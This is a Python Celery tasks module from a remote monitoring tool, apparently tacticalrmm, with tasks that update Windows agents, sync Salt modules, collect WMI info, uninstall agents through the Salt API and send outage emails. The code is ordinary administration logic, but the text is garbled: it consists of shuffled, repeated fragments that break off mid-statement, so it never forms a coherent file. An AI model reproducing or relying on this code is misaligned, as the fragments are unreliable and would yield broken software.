\"eauth\": \"<PASSWORD>\", } ], timeout=10,", "# sync modules, split into chunks of 50 agents to not overload salt", "@app.task def batch_sync_modules_task(): # sync modules, split into chunks of 50 agents to", "break if error: logger.error(f\"{salt_id} uninstall failed\") else: logger.info(f\"{salt_id} was successfully uninstalled\") try: r", "import version as pyver from django.conf import settings from tacticalrmm.celery import app from", "in chunks: for pk in chunk: agent = Agent.objects.get(pk=pk) r = agent.salt_api_async(func=\"win_agent.update_salt\") sleep(20)", "attempts += 1 else: if ret != \"ok\": attempts += 1 else: attempts", "if arch == \"64\" else f\"winagent-v{settings.LATEST_AGENT_VER}-x86.exe\" ) r = agent.salt_api_async( func=\"win_agent.do_agent_update_v2\", kwargs={ \"inno\":", "0: break if error: logger.error(f\"{salt_id} uninstall failed\") else: logger.info(f\"{salt_id} was successfully uninstalled\") try:", "import settings from tacticalrmm.celery import app from agents.models import Agent, AgentOutage from core.models", "}, ) sleep(10) @app.task def auto_self_agent_update_task(): core = CoreSettings.objects.first() if not core.agent_auto_update: return", "q if pyver.parse(i.version) < pyver.parse(settings.LATEST_AGENT_VER) ] chunks = (agents[i : i + 30]", "= (online[i : i + 30] for i in range(0, len(online), 30)) for", "system info using WMI agents = Agent.objects.all() online = [ i.salt_id for i", "json=[ { \"client\": \"local\", \"tgt\": salt_id, \"fun\": \"win_agent.uninstall_agent\", \"timeout\": 8, \"username\": settings.SALT_USERNAME, \"password\":", "pk in chunk: agent = Agent.objects.get(pk=pk) if agent.operating_system is not None: if \"64bit\"", "!= \"ok\": attempts += 1 else: attempts = 0 if attempts >= 10:", "True outage.save(update_fields=[\"recovery_email_sent\"]) @app.task def agent_outages_task(): agents = Agent.objects.only(\"pk\") for agent in agents: if", "if \"64bit\" in agent.operating_system: arch = \"64\" elif \"32bit\" in agent.operating_system: arch =", "remove salt-key\") return \"ok\" @app.task def agent_outage_email_task(pk): sleep(random.randint(1, 15)) outage = AgentOutage.objects.get(pk=pk) outage.send_outage_email()", "+ 30] for i in range(0, len(online), 30)) for chunk in chunks: Agent.salt_batch_async(minions=chunk,", "== \"timeout\" or r == \"error\": logger.error(f\"Unable to sync modules {agent.salt_id}\") return logger.info(f\"Successfully", "arch = \"64\" url = settings.DL_64 if arch == \"64\" else settings.DL_32 inno", "url, }, ) sleep(10) @app.task def auto_self_agent_update_task(): core = CoreSettings.objects.first() if not core.agent_auto_update:", "[{'MINION-15': ['modules.get_eventlog', 'modules.win_agent', 'etc...']}]} # successful sync with no new/changed files: {'return': [{'MINION-15':", "\"timeout\" or r == \"error\": return \"failed\" agent.wmi_detail = r agent.save(update_fields=[\"wmi_detail\"]) return \"ok\"", "pyver.parse(\"0.11.0\") and pyver.parse(i.salt_ver) < pyver.parse(settings.LATEST_SALT_VER) ] chunks = (agents[i : i + 50]", "on {agent.hostname}\") return \"ok\" @app.task def batch_sync_modules_task(): # sync modules, split into chunks", "chunks: for pk in chunk: agent = Agent.objects.get(pk=pk) r = agent.salt_api_async(func=\"win_agent.update_salt\") sleep(20) @app.task", "chunks = (online[i : i + 50] for i in range(0, len(online), 50))", "if not core.agent_auto_update: return q = Agent.objects.all() agents = [ i.pk for i", "def sync_salt_modules_task(pk): agent = Agent.objects.get(pk=pk) r = agent.salt_api_cmd(timeout=35, func=\"saltutil.sync_modules\") # successful sync if", "== \"error\": return \"failed\" agent.wmi_detail = r agent.save(update_fields=[\"wmi_detail\"]) return \"ok\" @app.task def sync_salt_modules_task(pk):", "import os import subprocess from loguru import logger from time import sleep import", "== \"64\" else settings.DL_32 inno = ( f\"winagent-v{version}.exe\" if arch == \"64\" else", "import subprocess from loguru import logger from time import sleep import random import", "failed\") else: logger.info(f\"{salt_id} was successfully uninstalled\") try: r = requests.post( f\"http://{settings.SALT_HOST}:8123/run\", json=[ {", "i.status == \"online\" ] chunks = (online[i : i + 30] for i", "os import subprocess from loguru import logger from time import sleep import random", "+= 1 else: attempts = 0 if attempts >= 10: error = True", ") except Exception: logger.error(f\"{salt_id} unable to remove salt-key\") return \"ok\" @app.task def agent_outage_email_task(pk):", "True outage.save(update_fields=[\"outage_email_sent\"]) @app.task def agent_recovery_email_task(pk): sleep(random.randint(1, 15)) outage = AgentOutage.objects.get(pk=pk) outage.send_recovery_email() outage.recovery_email_sent =", "for i in range(0, len(online), 30)) for chunk in chunks: Agent.salt_batch_async(minions=chunk, func=\"win_agent.local_sys_info\") sleep(10)", "chunks = (agents[i : i + 50] for i in range(0, len(agents), 50))", "r = requests.post( f\"http://{settings.SALT_HOST}:8123/run\", json=[ { \"client\": \"wheel\", \"fun\": \"key.delete\", \"match\": salt_id, \"username\":", "q = Agent.objects.all() agents = [ i.pk for i in q if pyver.parse(i.version)", "chunk in chunks: Agent.salt_batch_async(minions=chunk, func=\"saltutil.sync_modules\") sleep(10) @app.task def batch_sysinfo_task(): # update system info", "to remove salt-key\") return \"ok\" @app.task def agent_outage_email_task(pk): sleep(random.randint(1, 15)) outage = AgentOutage.objects.get(pk=pk)", "assert isinstance(pks, list) q = Agent.objects.filter(pk__in=pks) agents = [i.pk for i in q", "# update system info using WMI agents = Agent.objects.all() online = [ i.salt_id", "@app.task def agent_recovery_email_task(pk): sleep(random.randint(1, 15)) outage = AgentOutage.objects.get(pk=pk) outage.send_recovery_email() outage.recovery_email_sent = True outage.save(update_fields=[\"recovery_email_sent\"])", "url, }, ) sleep(10) @app.task def update_salt_minion_task(): q = Agent.objects.all() agents = [", "@app.task def sync_salt_modules_task(pk): agent = Agent.objects.get(pk=pk) r = agent.salt_api_cmd(timeout=35, func=\"saltutil.sync_modules\") # successful sync", "f\"http://{settings.SALT_HOST}:8123/run\", json=[ { \"client\": \"wheel\", \"fun\": \"key.delete\", \"match\": salt_id, \"username\": settings.SALT_USERNAME, \"password\": settings.SALT_PASSWORD,", "= Agent.objects.all() agents = [ i.pk for i in q if pyver.parse(i.version) >=", "outage.save(update_fields=[\"recovery_email_sent\"]) @app.task def agent_outages_task(): agents = Agent.objects.only(\"pk\") for agent in agents: if agent.status", "\"64\" else f\"winagent-v{version}-x86.exe\" ) r = agent.salt_api_async( func=\"win_agent.do_agent_update_v2\", kwargs={ \"inno\": inno, \"url\": url,", "version): assert isinstance(pks, list) q = Agent.objects.filter(pk__in=pks) agents = [i.pk for i in", "= Agent.objects.all() online = [ i.salt_id for i in agents if not i.not_supported(\"0.11.0\")", "1 else: attempts = 0 if attempts >= 10: error = True break", "sync_salt_modules_task(pk): agent = Agent.objects.get(pk=pk) r = agent.salt_api_cmd(timeout=35, func=\"saltutil.sync_modules\") # successful sync if new/charnged", "[]}]} if r == \"timeout\" or r == \"error\": logger.error(f\"Unable to sync modules", "tacticalrmm.celery import app from agents.models import Agent, AgentOutage from core.models import CoreSettings logger.configure(**settings.LOG_CONFIG)", "\"fun\": \"key.delete\", \"match\": salt_id, \"username\": settings.SALT_USERNAME, \"password\": settings.SALT_PASSWORD, \"eauth\": \"<PASSWORD>\", } ], timeout=30,", "requests from packaging import version as pyver from django.conf import settings from tacticalrmm.celery", "import app from agents.models import Agent, AgentOutage from core.models import CoreSettings logger.configure(**settings.LOG_CONFIG) @app.task", ": i + 50] for i in range(0, len(agents), 50)) for chunk in", "[i.pk for i in q if pyver.parse(i.version) < pyver.parse(version)] chunks = (agents[i :", "into chunks of 50 agents to not overload salt agents = Agent.objects.all() online", "break elif attempts == 0: break if error: logger.error(f\"{salt_id} uninstall failed\") else: logger.info(f\"{salt_id}", "range(0, len(online), 50)) for chunk in chunks: Agent.salt_batch_async(minions=chunk, func=\"saltutil.sync_modules\") sleep(10) @app.task def batch_sysinfo_task():", "0 if attempts >= 10: error = True break elif attempts == 0:", "len(agents), 50)) for chunk in chunks: for pk in chunk: agent = Agent.objects.get(pk=pk)", "agents = [i.pk for i in q if pyver.parse(i.version) < pyver.parse(version)] chunks =", "] chunks = (online[i : i + 30] for i in range(0, len(online),", "elif attempts == 0: break if error: logger.error(f\"{salt_id} uninstall failed\") else: logger.info(f\"{salt_id} was", "\"password\": settings.SALT_PASSWORD, \"eauth\": \"<PASSWORD>\", } ], timeout=10, ) ret = r.json()[\"return\"][0][salt_id] except Exception:", "chunks: Agent.salt_batch_async(minions=chunk, func=\"win_agent.local_sys_info\") sleep(10) @app.task def uninstall_agent_task(salt_id): attempts = 0 error = False", "from loguru import logger from time import sleep import random import requests from", "random import requests from packaging import version as pyver from django.conf import settings", "outages = AgentOutage.objects.filter(agent=agent) if outages and outages.last().is_active: continue outage = AgentOutage(agent=agent) outage.save() if", "sleep(random.randint(1, 15)) outage = AgentOutage.objects.get(pk=pk) outage.send_outage_email() outage.outage_email_sent = True outage.save(update_fields=[\"outage_email_sent\"]) @app.task def agent_recovery_email_task(pk):", "[ i.salt_id for i in agents if not i.not_supported(\"0.11.0\") and i.status == \"online\"", "agent.salt_api_async(func=\"win_agent.update_salt\") sleep(20) @app.task def get_wmi_detail_task(pk): agent = Agent.objects.get(pk=pk) r = agent.salt_api_cmd(timeout=30, func=\"win_agent.system_info\") if", "= True outage.save(update_fields=[\"outage_email_sent\"]) @app.task def agent_recovery_email_task(pk): sleep(random.randint(1, 15)) outage = AgentOutage.objects.get(pk=pk) outage.send_recovery_email() outage.recovery_email_sent", "== 0: break if error: logger.error(f\"{salt_id} uninstall failed\") else: logger.info(f\"{salt_id} was successfully uninstalled\")", "agent.save(update_fields=[\"wmi_detail\"]) return \"ok\" @app.task def sync_salt_modules_task(pk): agent = Agent.objects.get(pk=pk) r = agent.salt_api_cmd(timeout=35, func=\"saltutil.sync_modules\")", "pyver.parse(settings.LATEST_AGENT_VER) ] chunks = (agents[i : i + 30] for i in range(0,", "= [ i.pk for i in q if pyver.parse(i.version) >= pyver.parse(\"0.11.0\") and pyver.parse(i.salt_ver)", "\"failed\" agent.wmi_detail = r agent.save(update_fields=[\"wmi_detail\"]) return \"ok\" @app.task def sync_salt_modules_task(pk): agent = Agent.objects.get(pk=pk)", "= \"64\" url = settings.DL_64 if arch == \"64\" else settings.DL_32 inno =", "pyver.parse(i.version) >= pyver.parse(\"0.11.0\") and pyver.parse(i.salt_ver) < pyver.parse(settings.LATEST_SALT_VER) ] chunks = (agents[i : i", "send_agent_update_task(pks, version): assert isinstance(pks, list) q = Agent.objects.filter(pk__in=pks) agents = [i.pk for i", "= Agent.objects.all() online = [i.salt_id for i in agents if i.status == \"online\"]", "sync modules {agent.salt_id}\") return logger.info(f\"Successfully synced salt modules on {agent.hostname}\") return \"ok\" @app.task", "successful sync if new/charnged files: {'return': [{'MINION-15': ['modules.get_eventlog', 'modules.win_agent', 'etc...']}]} # successful sync", "app from agents.models import Agent, AgentOutage from core.models import CoreSettings logger.configure(**settings.LOG_CONFIG) @app.task def", "\"inno\": inno, \"url\": url, }, ) sleep(10) @app.task def update_salt_minion_task(): q = Agent.objects.all()", "\"32\" else: arch = \"64\" url = settings.DL_64 if arch == \"64\" else", "chunk: agent = Agent.objects.get(pk=pk) if agent.operating_system is not None: if \"64bit\" in agent.operating_system:", "logger.error(f\"Unable to sync modules {agent.salt_id}\") return logger.info(f\"Successfully synced salt modules on {agent.hostname}\") return", "0 error = False while 1: try: r = requests.post( f\"http://{settings.SALT_HOST}:8123/run\", json=[ {", "outage.send_recovery_email() outage.recovery_email_sent = True outage.save(update_fields=[\"recovery_email_sent\"]) @app.task def agent_outages_task(): agents = Agent.objects.only(\"pk\") for agent", "is not None: if \"64bit\" in agent.operating_system: arch = \"64\" elif \"32bit\" in", "func=\"saltutil.sync_modules\") sleep(10) @app.task def batch_sysinfo_task(): # update system info using WMI agents =", "def get_wmi_detail_task(pk): agent = Agent.objects.get(pk=pk) r = agent.salt_api_cmd(timeout=30, func=\"win_agent.system_info\") if r == \"timeout\"", "== \"online\"] chunks = (online[i : i + 50] for i in range(0,", "not core.agent_auto_update: return q = Agent.objects.all() agents = [ i.pk for i in", "\"overdue\": outages = AgentOutage.objects.filter(agent=agent) if outages and outages.last().is_active: continue outage = AgentOutage(agent=agent) outage.save()", "import CoreSettings logger.configure(**settings.LOG_CONFIG) @app.task def send_agent_update_task(pks, version): assert isinstance(pks, list) q = Agent.objects.filter(pk__in=pks)", "agent = Agent.objects.get(pk=pk) r = agent.salt_api_async(func=\"win_agent.update_salt\") sleep(20) @app.task def get_wmi_detail_task(pk): agent = Agent.objects.get(pk=pk)", "\"key.delete\", \"match\": salt_id, \"username\": settings.SALT_USERNAME, \"password\": settings.SALT_PASSWORD, \"eauth\": \"<PASSWORD>\", } ], timeout=30, )", "[{'MINION-15': []}]} if r == \"timeout\" or r == \"error\": logger.error(f\"Unable to sync", "elif \"32bit\" in agent.operating_system: arch = \"32\" else: arch = \"64\" url =", "agents = Agent.objects.only(\"pk\") for agent in agents: if agent.status == \"overdue\": outages =", "if attempts >= 10: error = True break elif attempts == 0: break", "batch_sysinfo_task(): # update system info using WMI agents = Agent.objects.all() online = [", "salt-key\") return \"ok\" @app.task def agent_outage_email_task(pk): sleep(random.randint(1, 15)) outage = AgentOutage.objects.get(pk=pk) outage.send_outage_email() outage.outage_email_sent", "= agent.salt_api_cmd(timeout=30, func=\"win_agent.system_info\") if r == \"timeout\" or r == \"error\": return \"failed\"", "def agent_outages_task(): agents = Agent.objects.only(\"pk\") for agent in agents: if agent.status == \"overdue\":", "\"url\": url, }, ) sleep(10) @app.task def update_salt_minion_task(): q = Agent.objects.all() agents =", "if outages and outages.last().is_active: continue outage = AgentOutage(agent=agent) outage.save() if agent.overdue_email_alert: agent_outage_email_task.delay(pk=outage.pk) if", "requests.post( f\"http://{settings.SALT_HOST}:8123/run\", json=[ { \"client\": \"local\", \"tgt\": salt_id, \"fun\": \"win_agent.uninstall_agent\", \"timeout\": 8, \"username\":", "unable to remove salt-key\") return \"ok\" @app.task def agent_outage_email_task(pk): sleep(random.randint(1, 15)) outage =", "\"inno\": inno, \"url\": url, }, ) sleep(10) @app.task def auto_self_agent_update_task(): core = CoreSettings.objects.first()", "\"win_agent.uninstall_agent\", \"timeout\": 8, \"username\": settings.SALT_USERNAME, \"password\": settings.SALT_PASSWORD, \"eauth\": \"<PASSWORD>\", } ], timeout=10, )", "+ 30] for i in range(0, len(agents), 30)) for chunk in chunks: for", "modules {agent.salt_id}\") return logger.info(f\"Successfully synced salt modules on {agent.hostname}\") return \"ok\" @app.task def", "if pyver.parse(i.version) < pyver.parse(version)] chunks = (agents[i : i + 30] for i", "else: arch = \"64\" url = settings.DL_64 if arch == \"64\" else settings.DL_32", "agent.salt_api_cmd(timeout=35, func=\"saltutil.sync_modules\") # successful sync if new/charnged files: {'return': [{'MINION-15': ['modules.get_eventlog', 'modules.win_agent', 'etc...']}]}", "None: if \"64bit\" in agent.operating_system: arch = \"64\" elif \"32bit\" in agent.operating_system: arch", "== \"64\" else f\"winagent-v{settings.LATEST_AGENT_VER}-x86.exe\" ) r = agent.salt_api_async( func=\"win_agent.do_agent_update_v2\", kwargs={ \"inno\": inno, \"url\":", "= True break elif attempts == 0: break if error: logger.error(f\"{salt_id} uninstall failed\")", "sync if new/charnged files: {'return': [{'MINION-15': ['modules.get_eventlog', 'modules.win_agent', 'etc...']}]} # successful sync with", "\"64\" else settings.DL_32 inno = ( f\"winagent-v{settings.LATEST_AGENT_VER}.exe\" if arch == \"64\" else f\"winagent-v{settings.LATEST_AGENT_VER}-x86.exe\"", "from agents.models import Agent, AgentOutage from core.models import CoreSettings logger.configure(**settings.LOG_CONFIG) @app.task def send_agent_update_task(pks,", "r = requests.post( f\"http://{settings.SALT_HOST}:8123/run\", json=[ { \"client\": \"local\", \"tgt\": salt_id, \"fun\": \"win_agent.uninstall_agent\", \"timeout\":", "sleep import random import requests from packaging import version as pyver from django.conf", "i + 30] for i in range(0, len(agents), 30)) for chunk in chunks:", "kwargs={ \"inno\": inno, \"url\": url, }, ) sleep(10) @app.task def auto_self_agent_update_task(): core =", "\"timeout\": 8, \"username\": settings.SALT_USERNAME, \"password\": settings.SALT_PASSWORD, \"eauth\": \"<PASSWORD>\", } ], timeout=10, ) ret", "= True outage.save(update_fields=[\"recovery_email_sent\"]) @app.task def agent_outages_task(): agents = Agent.objects.only(\"pk\") for agent in agents:", "core.models import CoreSettings logger.configure(**settings.LOG_CONFIG) @app.task def send_agent_update_task(pks, version): assert isinstance(pks, list) q =", "overload salt agents = Agent.objects.all() online = [i.salt_id for i in agents if", "50] for i in range(0, len(agents), 50)) for chunk in chunks: for pk", "files: {'return': [{'MINION-15': []}]} if r == \"timeout\" or r == \"error\": logger.error(f\"Unable", "chunks: Agent.salt_batch_async(minions=chunk, func=\"saltutil.sync_modules\") sleep(10) @app.task def batch_sysinfo_task(): # update system info using WMI", "pyver from django.conf import settings from tacticalrmm.celery import app from agents.models import Agent,", "CoreSettings logger.configure(**settings.LOG_CONFIG) @app.task def send_agent_update_task(pks, version): assert isinstance(pks, list) q = Agent.objects.filter(pk__in=pks) agents", "= Agent.objects.get(pk=pk) r = agent.salt_api_cmd(timeout=30, func=\"win_agent.system_info\") if r == \"timeout\" or r ==", "(agents[i : i + 30] for i in range(0, len(agents), 30)) for chunk", "Agent.objects.get(pk=pk) r = agent.salt_api_async(func=\"win_agent.update_salt\") sleep(20) @app.task def get_wmi_detail_task(pk): agent = Agent.objects.get(pk=pk) r =", "(online[i : i + 50] for i in range(0, len(online), 50)) for chunk", "= [i.salt_id for i in agents if i.status == \"online\"] chunks = (online[i", "agent.status == \"overdue\": outages = AgentOutage.objects.filter(agent=agent) if outages and outages.last().is_active: continue outage =", "Agent.objects.get(pk=pk) if agent.operating_system is not None: if \"64bit\" in agent.operating_system: arch = \"64\"", "= agent.salt_api_async( func=\"win_agent.do_agent_update_v2\", kwargs={ \"inno\": inno, \"url\": url, }, ) sleep(10) @app.task def", "sleep(10) @app.task def uninstall_agent_task(salt_id): attempts = 0 error = False while 1: try:", "= ( f\"winagent-v{version}.exe\" if arch == \"64\" else f\"winagent-v{version}-x86.exe\" ) r = agent.salt_api_async(", "50] for i in range(0, len(online), 50)) for chunk in chunks: Agent.salt_batch_async(minions=chunk, func=\"saltutil.sync_modules\")", "== \"64\" else f\"winagent-v{version}-x86.exe\" ) r = agent.salt_api_async( func=\"win_agent.do_agent_update_v2\", kwargs={ \"inno\": inno, \"url\":", "[ i.pk for i in q if pyver.parse(i.version) >= pyver.parse(\"0.11.0\") and pyver.parse(i.salt_ver) <", "def agent_recovery_email_task(pk): sleep(random.randint(1, 15)) outage = AgentOutage.objects.get(pk=pk) outage.send_recovery_email() outage.recovery_email_sent = True outage.save(update_fields=[\"recovery_email_sent\"]) @app.task", "f\"http://{settings.SALT_HOST}:8123/run\", json=[ { \"client\": \"local\", \"tgt\": salt_id, \"fun\": \"win_agent.uninstall_agent\", \"timeout\": 8, \"username\": settings.SALT_USERNAME,", "timeout=30, ) except Exception: logger.error(f\"{salt_id} unable to remove salt-key\") return \"ok\" @app.task def", "AgentOutage.objects.get(pk=pk) outage.send_recovery_email() outage.recovery_email_sent = True outage.save(update_fields=[\"recovery_email_sent\"]) @app.task def agent_outages_task(): agents = Agent.objects.only(\"pk\") for", "settings.DL_32 inno = ( f\"winagent-v{version}.exe\" if arch == \"64\" else f\"winagent-v{version}-x86.exe\" ) r", "i in q if pyver.parse(i.version) < pyver.parse(version)] chunks = (agents[i : i +", "def update_salt_minion_task(): q = Agent.objects.all() agents = [ i.pk for i in q", "\"tgt\": salt_id, \"fun\": \"win_agent.uninstall_agent\", \"timeout\": 8, \"username\": settings.SALT_USERNAME, \"password\": settings.SALT_PASSWORD, \"eauth\": \"<PASSWORD>\", }", "< pyver.parse(settings.LATEST_AGENT_VER) ] chunks = (agents[i : i + 30] for i in", "settings from tacticalrmm.celery import app from agents.models import Agent, AgentOutage from core.models import", "= \"32\" else: arch = \"64\" url = settings.DL_64 if arch == \"64\"", "pyver.parse(version)] chunks = (agents[i : i + 30] for i in range(0, len(agents),", "files: {'return': [{'MINION-15': ['modules.get_eventlog', 'modules.win_agent', 'etc...']}]} # successful sync with no new/changed files:", "\"error\": logger.error(f\"Unable to sync modules {agent.salt_id}\") return logger.info(f\"Successfully synced salt modules on {agent.hostname}\")", "for i in q if pyver.parse(i.version) < pyver.parse(version)] chunks = (agents[i : i", "\"32bit\" in agent.operating_system: arch = \"32\" else: arch = \"64\" url = settings.DL_64", "settings.DL_64 if arch == \"64\" else settings.DL_32 inno = ( f\"winagent-v{settings.LATEST_AGENT_VER}.exe\" if arch", "else: if ret != \"ok\": attempts += 1 else: attempts = 0 if", "def agent_outage_email_task(pk): sleep(random.randint(1, 15)) outage = AgentOutage.objects.get(pk=pk) outage.send_outage_email() outage.outage_email_sent = True outage.save(update_fields=[\"outage_email_sent\"]) @app.task", "\"64\" url = settings.DL_64 if arch == \"64\" else settings.DL_32 inno = (", ") ret = r.json()[\"return\"][0][salt_id] except Exception: attempts += 1 else: if ret !=", "settings.SALT_PASSWORD, \"eauth\": \"<PASSWORD>\", } ], timeout=10, ) ret = r.json()[\"return\"][0][salt_id] except Exception: attempts", "json=[ { \"client\": \"wheel\", \"fun\": \"key.delete\", \"match\": salt_id, \"username\": settings.SALT_USERNAME, \"password\": settings.SALT_PASSWORD, \"eauth\":", "agent_outage_email_task(pk): sleep(random.randint(1, 15)) outage = AgentOutage.objects.get(pk=pk) outage.send_outage_email() outage.outage_email_sent = True outage.save(update_fields=[\"outage_email_sent\"]) @app.task def", ": i + 30] for i in range(0, len(online), 30)) for chunk in", "settings.SALT_USERNAME, \"password\": settings.SALT_PASSWORD, \"eauth\": \"<PASSWORD>\", } ], timeout=10, ) ret = r.json()[\"return\"][0][salt_id] except", "Agent.objects.all() online = [i.salt_id for i in agents if i.status == \"online\"] chunks", "agent_recovery_email_task(pk): sleep(random.randint(1, 15)) outage = AgentOutage.objects.get(pk=pk) outage.send_recovery_email() outage.recovery_email_sent = True outage.save(update_fields=[\"recovery_email_sent\"]) @app.task def", "= Agent.objects.filter(pk__in=pks) agents = [i.pk for i in q if pyver.parse(i.version) < pyver.parse(version)]", "sleep(20) @app.task def get_wmi_detail_task(pk): agent = Agent.objects.get(pk=pk) r = agent.salt_api_cmd(timeout=30, func=\"win_agent.system_info\") if r", "func=\"win_agent.system_info\") if r == \"timeout\" or r == \"error\": return \"failed\" agent.wmi_detail =", "agents = [ i.pk for i in q if pyver.parse(i.version) >= pyver.parse(\"0.11.0\") and", "@app.task def batch_sysinfo_task(): # update system info using WMI agents = Agent.objects.all() online", "except Exception: logger.error(f\"{salt_id} unable to remove salt-key\") return \"ok\" @app.task def agent_outage_email_task(pk): sleep(random.randint(1,", "outage = AgentOutage.objects.get(pk=pk) outage.send_recovery_email() outage.recovery_email_sent = True outage.save(update_fields=[\"recovery_email_sent\"]) @app.task def agent_outages_task(): agents =", "in q if pyver.parse(i.version) >= pyver.parse(\"0.11.0\") and pyver.parse(i.salt_ver) < pyver.parse(settings.LATEST_SALT_VER) ] chunks =", "django.conf import settings from tacticalrmm.celery import app from agents.models import Agent, AgentOutage from", "[ i.pk for i in q if pyver.parse(i.version) < pyver.parse(settings.LATEST_AGENT_VER) ] chunks =", "from packaging import version as pyver from django.conf import settings from tacticalrmm.celery import", "i in range(0, len(agents), 50)) for chunk in chunks: for pk in chunk:", "i in agents if i.status == \"online\"] chunks = (online[i : i +", "if error: logger.error(f\"{salt_id} uninstall failed\") else: logger.info(f\"{salt_id} was successfully uninstalled\") try: r =", "= [ i.salt_id for i in agents if not i.not_supported(\"0.11.0\") and i.status ==", "if agent.operating_system is not None: if \"64bit\" in agent.operating_system: arch = \"64\" elif", "settings.SALT_PASSWORD, \"eauth\": \"<PASSWORD>\", } ], timeout=30, ) except Exception: logger.error(f\"{salt_id} unable to remove", "Exception: logger.error(f\"{salt_id} unable to remove salt-key\") return \"ok\" @app.task def agent_outage_email_task(pk): sleep(random.randint(1, 15))", "}, ) sleep(10) @app.task def update_salt_minion_task(): q = Agent.objects.all() agents = [ i.pk", "{ \"client\": \"wheel\", \"fun\": \"key.delete\", \"match\": salt_id, \"username\": settings.SALT_USERNAME, \"password\": settings.SALT_PASSWORD, \"eauth\": \"<PASSWORD>\",", "= (agents[i : i + 30] for i in range(0, len(agents), 30)) for", "chunk in chunks: Agent.salt_batch_async(minions=chunk, func=\"win_agent.local_sys_info\") sleep(10) @app.task def uninstall_agent_task(salt_id): attempts = 0 error", "inno, \"url\": url, }, ) sleep(10) @app.task def auto_self_agent_update_task(): core = CoreSettings.objects.first() if", "r == \"timeout\" or r == \"error\": return \"failed\" agent.wmi_detail = r agent.save(update_fields=[\"wmi_detail\"])", "AgentOutage from core.models import CoreSettings logger.configure(**settings.LOG_CONFIG) @app.task def send_agent_update_task(pks, version): assert isinstance(pks, list)", "in chunks: for pk in chunk: agent = Agent.objects.get(pk=pk) if agent.operating_system is not", "logger.info(f\"{salt_id} was successfully uninstalled\") try: r = requests.post( f\"http://{settings.SALT_HOST}:8123/run\", json=[ { \"client\": \"wheel\",", "= (agents[i : i + 50] for i in range(0, len(agents), 50)) for", "== \"error\": logger.error(f\"Unable to sync modules {agent.salt_id}\") return logger.info(f\"Successfully synced salt modules on", "f\"winagent-v{settings.LATEST_AGENT_VER}.exe\" if arch == \"64\" else f\"winagent-v{settings.LATEST_AGENT_VER}-x86.exe\" ) r = agent.salt_api_async( func=\"win_agent.do_agent_update_v2\", kwargs={", "i.pk for i in q if pyver.parse(i.version) >= pyver.parse(\"0.11.0\") and pyver.parse(i.salt_ver) < pyver.parse(settings.LATEST_SALT_VER)", "( f\"winagent-v{settings.LATEST_AGENT_VER}.exe\" if arch == \"64\" else f\"winagent-v{settings.LATEST_AGENT_VER}-x86.exe\" ) r = agent.salt_api_async( func=\"win_agent.do_agent_update_v2\",", "pk in chunk: agent = Agent.objects.get(pk=pk) r = agent.salt_api_async(func=\"win_agent.update_salt\") sleep(20) @app.task def get_wmi_detail_task(pk):", "in chunks: Agent.salt_batch_async(minions=chunk, func=\"saltutil.sync_modules\") sleep(10) @app.task def batch_sysinfo_task(): # update system info using", "inno, \"url\": url, }, ) sleep(10) @app.task def update_salt_minion_task(): q = Agent.objects.all() agents", "for i in agents if i.status == \"online\"] chunks = (online[i : i", "kwargs={ \"inno\": inno, \"url\": url, }, ) sleep(10) @app.task def update_salt_minion_task(): q =", "and outages.last().is_active: continue outage = AgentOutage(agent=agent) outage.save() if agent.overdue_email_alert: agent_outage_email_task.delay(pk=outage.pk) if agent.overdue_text_alert: #", "inno = ( f\"winagent-v{settings.LATEST_AGENT_VER}.exe\" if arch == \"64\" else f\"winagent-v{settings.LATEST_AGENT_VER}-x86.exe\" ) r =", "from tacticalrmm.celery import app from agents.models import Agent, AgentOutage from core.models import CoreSettings", "try: r = requests.post( f\"http://{settings.SALT_HOST}:8123/run\", json=[ { \"client\": \"local\", \"tgt\": salt_id, \"fun\": \"win_agent.uninstall_agent\",", "for i in range(0, len(agents), 30)) for chunk in chunks: for pk in", "import requests from packaging import version as pyver from django.conf import settings from", "\"client\": \"wheel\", \"fun\": \"key.delete\", \"match\": salt_id, \"username\": settings.SALT_USERNAME, \"password\": settings.SALT_PASSWORD, \"eauth\": \"<PASSWORD>\", }", "return \"ok\" @app.task def sync_salt_modules_task(pk): agent = Agent.objects.get(pk=pk) r = agent.salt_api_cmd(timeout=35, func=\"saltutil.sync_modules\") #", "if new/charnged files: {'return': [{'MINION-15': ['modules.get_eventlog', 'modules.win_agent', 'etc...']}]} # successful sync with no", "chunks: for pk in chunk: agent = Agent.objects.get(pk=pk) if agent.operating_system is not None:", "\"ok\" @app.task def sync_salt_modules_task(pk): agent = Agent.objects.get(pk=pk) r = agent.salt_api_cmd(timeout=35, func=\"saltutil.sync_modules\") # successful", "{agent.salt_id}\") return logger.info(f\"Successfully synced salt modules on {agent.hostname}\") return \"ok\" @app.task def batch_sync_modules_task():", "error: logger.error(f\"{salt_id} uninstall failed\") else: logger.info(f\"{salt_id} was successfully uninstalled\") try: r = requests.post(", "settings.SALT_USERNAME, \"password\": settings.SALT_PASSWORD, \"eauth\": \"<PASSWORD>\", } ], timeout=30, ) except Exception: logger.error(f\"{salt_id} unable", "arch == \"64\" else f\"winagent-v{version}-x86.exe\" ) r = agent.salt_api_async( func=\"win_agent.do_agent_update_v2\", kwargs={ \"inno\": inno,", "\"username\": settings.SALT_USERNAME, \"password\": settings.SALT_PASSWORD, \"eauth\": \"<PASSWORD>\", } ], timeout=30, ) except Exception: logger.error(f\"{salt_id}", "f\"winagent-v{settings.LATEST_AGENT_VER}-x86.exe\" ) r = agent.salt_api_async( func=\"win_agent.do_agent_update_v2\", kwargs={ \"inno\": inno, \"url\": url, }, )", ">= pyver.parse(\"0.11.0\") and pyver.parse(i.salt_ver) < pyver.parse(settings.LATEST_SALT_VER) ] chunks = (agents[i : i +", "for chunk in chunks: Agent.salt_batch_async(minions=chunk, func=\"saltutil.sync_modules\") sleep(10) @app.task def batch_sysinfo_task(): # update system", ">= 10: error = True break elif attempts == 0: break if error:", "import random import requests from packaging import version as pyver from django.conf import", "from core.models import CoreSettings logger.configure(**settings.LOG_CONFIG) @app.task def send_agent_update_task(pks, version): assert isinstance(pks, list) q", "version as pyver from django.conf import settings from tacticalrmm.celery import app from agents.models", "\"local\", \"tgt\": salt_id, \"fun\": \"win_agent.uninstall_agent\", \"timeout\": 8, \"username\": settings.SALT_USERNAME, \"password\": settings.SALT_PASSWORD, \"eauth\": \"<PASSWORD>\",", "50 agents to not overload salt agents = Agent.objects.all() online = [i.salt_id for", "in range(0, len(online), 50)) for chunk in chunks: Agent.salt_batch_async(minions=chunk, func=\"saltutil.sync_modules\") sleep(10) @app.task def", "outage = AgentOutage.objects.get(pk=pk) outage.send_outage_email() outage.outage_email_sent = True 